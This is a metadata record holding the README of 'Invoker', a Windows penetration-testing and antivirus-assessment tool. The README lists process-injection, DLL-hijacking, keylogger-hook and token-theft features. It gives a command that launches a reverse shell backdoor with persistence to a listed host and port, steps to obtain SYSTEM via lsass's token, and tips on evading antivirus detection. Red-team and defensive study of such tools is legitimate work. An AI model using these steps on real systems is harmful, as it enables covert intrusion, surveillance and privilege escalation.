{"id":13622179,"url":"https://github.com/ivan-sincek/invoker","last_synced_at":"2025-04-07T06:12:58.352Z","repository":{"id":53062414,"uuid":"196415687","full_name":"ivan-sincek/invoker","owner":"ivan-sincek","description":"Penetration testing utility and antivirus assessment tool.","archived":false,"fork":false,"pushed_at":"2023-04-25T19:14:02.000Z","size":431,"stargazers_count":316,"open_issues_count":0,"forks_count":80,"subscribers_count":8,"default_branch":"master","last_synced_at":"2025-03-31T05:05:27.867Z","etag":null,"topics":["access-token","bytecode-injection","c-plus-plus","dll-injection","dump-memory","ethical-hacking","hook-procedure","malware","offensive-security","penetration-testing","process-ghosting","process-hollowing","red-team-engagement","reverse-tcp","security","sticky-keys","system-calls","task-scheduler","windows","windows-penetration-testing"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-07-11T14:58:41.000Z","updated_at":"2025-03-19T11:20:04.000Z","dependencies_parsed_at":"2023-02-17T11:45:21.853Z","dependency_job_id":"458a8b7b-8c7c-488e-a902-1fd034daa56a","html_url":"https://github.com/ivan-sincek/invoker","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub
/repositories/ivan-sincek%2Finvoker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Finvoker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/invoker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247601449,"owners_count":20964864,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["access-token","bytecode-injection","c-plus-plus","dll-injection","dump-memory","ethical-hacking","hook-procedure","malware","offensive-security","penetration-testing","process-ghosting","process-hollowing","red-team-engagement","reverse-tcp","security","sticky-keys","system-calls","task-scheduler","windows","windows-penetration-testing"],"created_at":"2024-08-01T21:01:15.231Z","updated_at":"2025-04-07T06:12:58.329Z","avatar_url":"https://github.com/ivan-sincek.png","language":"C++","funding_links":[],"categories":["C++","C++ (225)"],"sub_categories":[],"readme":"# Invoker\n\nPenetration testing utility and antivirus assessment tool.\n\nBuilt with Visual Studio Community 2022 v17.5.4 (64-bit) and tested on Windows 10 Enterprise OS (64-bit).\n\nMade for educational purposes. 
I hope it will help!\n\n**This repository started to have known signatures and I don't have time to upload new executables each time, so you should compile this project yourself.**\n\nUseful websites:\n\n* [elastic.co](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process)\n* [learn.microsoft.com](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format)\n* [processhacker.sourceforge.io](https://processhacker.sourceforge.io/doc/index.html)\n* [undocumented.ntinternals.net](http://undocumented.ntinternals.net/index.html)\n* [pinvoke.net](https://www.pinvoke.net)\n\nTo do:\n\n* make process ghosting compatible with the x86 architecture because `NtCreateProcessEx` doesn't work well with 32-bit processes.\n\nFuture plans:\n\n* ~~process hollowing,~~\n* process doppelgänging,\n* process herpaderping,\n* ~~process ghosting,~~\n* more DLL proxying invocations,\n* COM hijacking,\n* Python3 script to statically obfuscate the whole source code.\n\nThings I keep in mind while coding:\n\n* simplify everything,\n* ~~use dynamic allocations instead of static allocations,~~ (sometimes)\n* use the minimum required access rights and control flags,\n* handle/catch possible errors/exceptions,\n* zero-out and free arrays and memory after use,\n* properly close open handles/streams after use,\n* decrement the reference count of libraries, objects, and similar after use,\n* ~~call the garbage cleaner before exiting.~~ (not applicable)\n\nAll of the above will result in your PE having a smaller size and a lower detection rate.\n\n## Table of Contents\n\n* [Invoker Library](#invoker-library)\n* [How to Run](#how-to-run)\n* [Bytecode Injection](#bytecode-injection)\n* [Generate a Reverse Shell Payload](#generate-a-reverse-shell-payload)\n* [PowerShell](#powershell)\n* [Direct System Calls](#direct-system-calls)\n* [Make a DLL With a Hook Procedure](#make-a-dll-with-a-hook-procedure)\n* [Get the LocalSystem Account (NT 
AUTHORITY\\SYSTEM)](#get-the-localsystem-account-nt-authoritysystem)\n* [Images](#images)\n\n## Invoker Library\n\nFeatures:\n\n* invoke the system shells,\n* ~~make direct system calls,~~\n* use Windows Management Instrumentation (WMI),\n* connect to a remote host,\n* terminate a running process,\n* run a new process,\n* dump the memory of a process,\n* tamper with the executable image of a process,\n* inject bytecode into a process,\n* inject a DLL into a process,\n* list loaded DLLs of a process,\n* invoke DLL hijacking,\n* install a hook procedure,\n* enable access token privileges,\n* duplicate the access token of a process and run a new process,\n* download a file,\n* add/edit a registry key,\n* schedule a task,\n* list unquoted service paths and start, stop, or restart a service,\n* replace multiple System32 files.\n\nCheck the Invoker library [here](https://github.com/ivan-sincek/invoker/blob/master/src/Invoker/Invoker/lib/invoker/invoker.cpp). Feel free to use it!\n\n---\n\nSome features may require administrative privileges.\n\nSome features may not work on Windows XP and earlier because of the specific access rights and control flags they use.\n\n## How to Run\n\nRun Invoker_x86.exe (32-bit) or Invoker_x64.exe (64-bit).\n\nTo automate the reverse shell backdoor while adding persistence, run the following command:\n\n```fundamental\nInvoker_x64.exe 192.168.8.5:9000\n```\n\n32-bit Invoker can:\n\n* make direct system calls,\n* dump the memory of a 32-bit process,\n* tamper with and inject the executable image of a 32-bit process into a 32-bit process,\n* tamper with and inject the executable image of a 64-bit process into a 64-bit process,\n* inject 32-bit bytecode into a 32-bit process,\n* inject a 32-bit DLL into a 32-bit process,\n* list loaded DLLs of a 32-bit process,\n* install a hook procedure from a 32-bit DLL.\n\n64-bit Invoker can:\n\n* make direct system calls,\n* dump the memory of a 32-bit process,\n* dump the memory of a 64-bit process,\n* ~~tamper with 
and inject the executable image of a 32-bit process into a 32-bit process,~~\n* tamper with and inject the executable image of a 64-bit process into a 64-bit process,\n* inject 32-bit bytecode into a 32-bit process,\n* inject 64-bit bytecode into a 64-bit process,\n* ~~inject a 32-bit DLL into a 32-bit process,~~\n* inject a 64-bit DLL into a 64-bit process,\n* ~~list loaded DLLs of a 32-bit process,~~\n* list loaded DLLs of a 64-bit process,\n* ~~install a hook procedure from a 32-bit DLL,~~\n* install a hook procedure from a 64-bit DLL.\n\nNote that each injection technique has its pros and cons; e.g. one technique may require fewer access rights and use less suspicious methods, but might crash the process, or need extra time and other special conditions to execute the payload.\n\nNote that some C2C implants might not work after releasing the memory. In that case, comment out methods like `VirtualFreeEx`, `NtFreeVirtualMemory`, etc.\n\n## Bytecode Injection\n\nElevate privileges by injecting bytecode into a higher-privileged process.\n\nThis tool can download the content of a binary file into memory and inject it into a running process. It can also parse an HTTP response and extract the payload from a custom element, e.g. from `\u003cinvoker\u003epayload\u003c/invoker\u003e` where `payload` is binary code encoded in Base64.\n\nCheck the example at [pastebin.com/raw/xf9Trt0d](https://pastebin.com/raw/xf9Trt0d).\n\nThis is useful if antivirus is constantly deleting your local payloads.\n\nCheck an additional example at [pastebin.com/raw/iW17rCxH](https://pastebin.com/raw/iW17rCxH), where the payload is hidden in an image element.\n\nP.S. 
The bytecodes provided will most certainly not work for you.\n\nUse [ngrok](https://ngrok.com) to give your local web server a public address.\n\n---\n\nTo see if a process is 32-bit or 64-bit, open Task Manager -\u003e click on `More details` -\u003e go to the `Details` tab -\u003e right click on any of the columns -\u003e click on `Select columns` -\u003e check the `Platform` checkbox.\n\nTo see if a process is running with administrative privileges, check the `Elevated` checkbox.\n\n## Generate a Reverse Shell Payload\n\nFind out how to generate a reverse shell payload from my other [project](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#generate-a-reverse-shell-payload-for-windows-os), as well as how to set up [Ncat](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#ncat) and [multi/handler](https://github.com/ivan-sincek/penetration-testing-cheat-sheet#multihandler) listeners.\n\nBytecode injection may fail because the bytecode may contain bad characters, use the wrong exit function, or be wrongly encoded; DLL injection is more reliable.\n\n## PowerShell\n\nIf you wish to run a PowerShell reverse or bind shell from the Invoker, open the Invoker and start a PowerShell session, then run any of the [one-liners](https://github.com/ivan-sincek/powershell-reverse-tcp#powershell-encoded-command) (from my other project).\n\n## Direct System Calls\n\nThe direct system calls library and assembly were generated with [SysWhispers2](https://github.com/jthuraisamy/SysWhispers2). 
Credits to the author!\n\nTo generate the same library and assembly, run the following command from your preferred console:\n\n```fundamental\npython3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -a all -o syscalls\n```\n\nCheck my wrapper around the library and assembly [here](https://github.com/ivan-sincek/invoker/blob/master/src/Invoker/Invoker/lib/invoker_syscalls/invoker_syscalls.cpp). Feel free to use it!\n\n## Make a DLL With a Hook Procedure\n\nCheck the simple DLL with a hook procedure [here](https://github.com/ivan-sincek/invoker/blob/master/src/InvokerHook/InvokerHook/dllmain.cpp). The hook procedure will invoke a message box on each window close.\n\nCheck the keyboard hook procedure (i.e. keylogger) [here](https://github.com/ivan-sincek/invoker/blob/master/src/KeyboardHook/KeyboardHook/dllmain.cpp).\n\nCheck the mouse hook procedure that will run a new process on the first mouse click [here](https://github.com/ivan-sincek/invoker/blob/master/src/RunProcessHook/RunProcessHook/dllmain.cpp).\n\nDon't forget to remove all the created artifacts after you are done testing, e.g. `keylogger.log`.\n\n## Get the LocalSystem Account (NT AUTHORITY\\SYSTEM)\n\nFollow these simple steps:\n\n1. Run the Invoker as administrator.\n\n2. Enable all access token privileges.\n\n3. Duplicate the access token from, e.g., the Local Security Authority Subsystem Service (lsass.exe) and run a new instance of the Invoker.\n\n4. Within the new Invoker instance, open the Command Prompt and run `whoami`; you should now see `nt authority\\system`.\n\n5. Enable all access token privileges once again.\n\n6. 
Close the old Invoker instance.\n\n## Images\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/invoker/blob/master/img/invoker.jpg\" alt=\"Invoker\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - Invoker\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/invoker/blob/master/img/bytecode_injection.jpg\" alt=\"Bytecode Injection\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 2 - Bytecode Injection\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/invoker/blob/master/img/elevated_privileges.jpg\" alt=\"Elevated Privileges\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 3 - Elevated Privileges\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Finvoker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Finvoker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Finvoker/lists"}